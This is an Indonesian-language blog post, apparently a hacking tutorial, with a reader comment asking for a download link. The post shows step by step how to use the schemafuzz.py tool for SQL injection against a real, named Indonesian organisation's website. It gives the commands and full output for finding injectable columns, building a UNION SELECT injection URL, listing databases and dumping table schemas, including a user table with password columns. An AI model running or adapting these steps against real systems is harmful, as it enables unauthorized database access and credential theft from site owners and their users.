Menggunakan schemafuzz.py
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi) 2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py) 3.CMD Dg cmd masuk ke folder tempat schemafuzz.py berada... Awali pertintah dengan format: schemafuzz.py -u "url target" --perintah List perintah ada dibawah... 1.Cari target Misal: http://www.ditplb.or.id/profile.php?id=1 2.Masukkan perintah untuk mencari colom Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol Maka keluar: [+] URL: http://www.ditplb.or.id/profile.php?id=1-- [+] Evasion Used: "+" "--" [+] 20:36:29 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2, [+] Column Length is: 3 [+] Found null column at column #: 2 [+] SQLi URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2-- [+] darkc0de URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de [-] Done! Berarti kita gunain http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de untuk inject 3.Cari database dg command --dbs Misal : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"; --dbs Maka keluar: [+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de-- [+] Evasion Used: "+" "--" [+] 20:39:32 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_pl...@localhost Version: 5.0.32-Debian_7etch8 [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0] t15618_plb [-] 20:39:39 [-] Total URL Requests 3 [-] Done keliatan kan nama databasenya ??? t15618_plb 4.Cari nama table dalam database Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"; --schema -D namadatabase Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"; --schema -D t15618_plb Maka keluar: [+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de-- [+] Evasion Used: "+" "--" [+] 20:43:10 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_pl...@localhost Version: 5.0.32-Debian_7etch8 [+] Showing Tables & Columns from database "t15618_plb" [+] Number of Tables: 11 [Database]: t15618_plb [Table: Columns] [0]bukutamu: id,pengirim,email,pesan [1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim [2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan [3]frm_kategori: id_kat,kategori [4]kabupaten: ID_kab,ID_prop,Kabupaten [5]pelatihan: ID,Pelatihan [6]profile: ID_Profile,sinopsis,Profile [7]propinsi: ID_prop,Propinsi [8]sd: ID_sd,ID_1,SD,Detail [9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email [10]user: ID_user,UserID,Password,Keterangan,Admin [-] 20:44:39 [-] Total URL Requests 43 [-] Done
1 comments:
mantabs gan, but http://darkc0de.com/others/schemafuzz.py udahn ga aktif gan??? ane pengen donlot gan, help me
Balasdjudul@yahoo.com